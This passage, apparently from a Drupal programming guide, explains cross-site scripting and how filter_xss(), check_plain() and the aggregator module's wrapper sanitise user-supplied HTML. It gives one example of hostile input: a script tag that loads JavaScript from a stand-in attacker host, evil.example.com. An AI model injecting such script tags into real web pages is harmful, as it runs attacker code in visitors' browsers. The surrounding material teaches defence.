Using filter_xss()
Cross Site Scripting (XSS) is a common form of attack on a web site where the attacker is able to insert his or her own code into a web page, which can then be used for all sorts of mischief.
Note: For examples of XSS attacks, see http://ha.ckers.org/xss.html.
Suppose that you allow users to enter HTML on your web site, expecting them to enter <em>Hi!</em> My name is Sally, and I... but instead they enter
<script src="http://evil.example.com/xss.js"></script>
Whoops! Again, the lesson is: never trust user input. Here is the function signature of filter_xss():
filter_xss($string, $allowed_tags = array('a', 'em', 'strong', 'cite', 'code', 'ul', 'ol', 'li', 'dl', 'dt', 'dd'))
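As a rough sketch of how this signature might be used from module code, the two helpers below pass user input through filter_xss(), first with the default tag list and then with a narrower one. The names example_clean_comment() and example_clean_strict() are hypothetical and not part of Drupal, and the snippet assumes it runs inside a bootstrapped Drupal site where filter_xss() is available.

```php
<?php
// Hypothetical helpers for illustration only. They rely on Drupal's
// filter_xss(), so they work only inside a Drupal site.

// Filter user-supplied HTML using the default list of allowed tags.
function example_clean_comment($input) {
  return filter_xss($input);
}

// Filter user-supplied HTML, allowing only the emphasis tags.
function example_clean_strict($input) {
  return filter_xss($input, array('em', 'strong'));
}
```

With the input from the example above, the <script> tag is on neither list, so both helpers would be expected to strip it, while <em>Hi!</em> should pass through unchanged.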
The filter_xss() function performs the following operations on the text string it is given:
1. It removes odd characters such as NULL and Netscape 4 JavaScript entities.
2. It ensures that HTML entities such as &amp; are well formed.
3. It ensures that HTML tags and tag attributes are well formed. During this process, tags that are not on the whitelist (that is, the second parameter for filter_xss()) are removed. The style attribute is removed, too, because it can interfere with the layout of a page by overriding CSS, or hide content, for example by setting a spammer's link color to the background color of the page. If you write regular expressions for fun and can name character codes for HTML entities from memory, you'll enjoy stepping through filter_xss() (found in modules/filter/filter.module) and its associated functions with a debugger.
4. It ensures that no HTML tags contain disallowed protocols. Allowed protocols are http, https, ftp, news, nntp, telnet, mailto, irc, ssh, sftp, and webcal. You can modify this list by setting the filter_allowed_protocols variable. For example, you could restrict the protocols to http and https by adding the following line to your settings.php file (see the comment about variable overrides in the settings.php file):
'filter_allowed_protocols' => array('http', 'https')
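For context, here is a sketch of where that line might sit in settings.php, assuming the $conf override array described in that file's comments. It is a configuration fragment, and any other entries in your own $conf array would stay alongside it.

```php
// Fragment of settings.php (assumes the $conf variable override array).
$conf = array(
  // Only http and https links survive filter_xss(); other protocols are disallowed.
  'filter_allowed_protocols' => array('http', 'https'),
);
```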
Here's an example of the use of filter_xss() from aggregator.module, a module that deals with potentially dangerous RSS or Atom feeds. Here the module is preparing to display a feed:
function theme_aggregator_feed($feed) {
  $output = '<div class="feed-source">';
  $output .= theme('feed_icon', $feed->url) ."\n";
  $output .= $feed->image;
  $output .= '<div class="feed-description">'. aggregator_filter_xss($feed->description) ."</div>\n";
  $output .= '<div class="feed-url"><em>'. t('URL:') .'</em> '. l($feed->link, $feed->link, array(), NULL, NULL, TRUE) ."</div>\n";
  // The remainder of the function is omitted in this excerpt.
}
Sharp-eyed readers will note that the call to l() in our example code from theme_aggregator_feed() just passes $feed->link as a parameter to l() without doing any checking. That's because the l() function has a check_plain() call inside it for convenience. Other places where check_plain() is called automatically are when the menu hook gathers titles of menu items and in theme('placeholder'). Other than these cases, you should always call check_plain() yourself to ensure security.
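To make the effect of that escaping concrete, here is a minimal standalone sketch. It assumes check_plain() behaves roughly like PHP's htmlspecialchars() with ENT_QUOTES. The helper name example_escape_plain() is hypothetical and is not part of Drupal.

```php
<?php
// Hypothetical stand-in for check_plain(), for experimenting outside Drupal.
// Assumption: check_plain() escapes HTML special characters, including quotes.
function example_escape_plain($text) {
  return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// A malicious "title" is rendered harmless because the markup is escaped.
$title = '<script>alert("xss")</script>';
echo example_escape_plain($title), "\n";
// prints: &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
```

Inside Drupal you would call check_plain() itself rather than a helper like this one.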
Note the call to aggregator_filter_xss(), which is a wrapper for filter_xss() and provides an array of acceptable HTML tags. We have slightly simplified the function in the following code:
/**
 * Safely render HTML content, as allowed.
 */
function aggregator_filter_xss($value) {
  $tags = variable_get("aggregator_allowed_html_tags",
    '<a> <b> <br> <dd> <dl> <dt> <em> <i> <li> <ol> <p> <strong> <u> <ul>');
  // Turn tag list into an array so we can pass it as a parameter.
  $allowed_tags = preg_split('/\s+|<|>/', $tags, -1, PREG_SPLIT_NO_EMPTY);
  return filter_xss($value, $allowed_tags);
}
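The tag-splitting step is easy to try on its own. The sketch below wraps the same preg_split() call in a hypothetical helper, example_tag_list_to_array(), which is not part of Drupal, to show how a string of tags becomes the array that filter_xss() expects.

```php
<?php
// Hypothetical helper that isolates the splitting step from aggregator_filter_xss().
function example_tag_list_to_array($tags) {
  // Split on whitespace and angle brackets, discarding the empty pieces.
  return preg_split('/\s+|<|>/', $tags, -1, PREG_SPLIT_NO_EMPTY);
}

print_r(example_tag_list_to_array('<a> <em> <strong>'));
// The result is array('a', 'em', 'strong').
```

Because of PREG_SPLIT_NO_EMPTY, the empty strings that would otherwise appear between adjacent delimiters (such as ">" followed by a space) are dropped, leaving only the bare tag names.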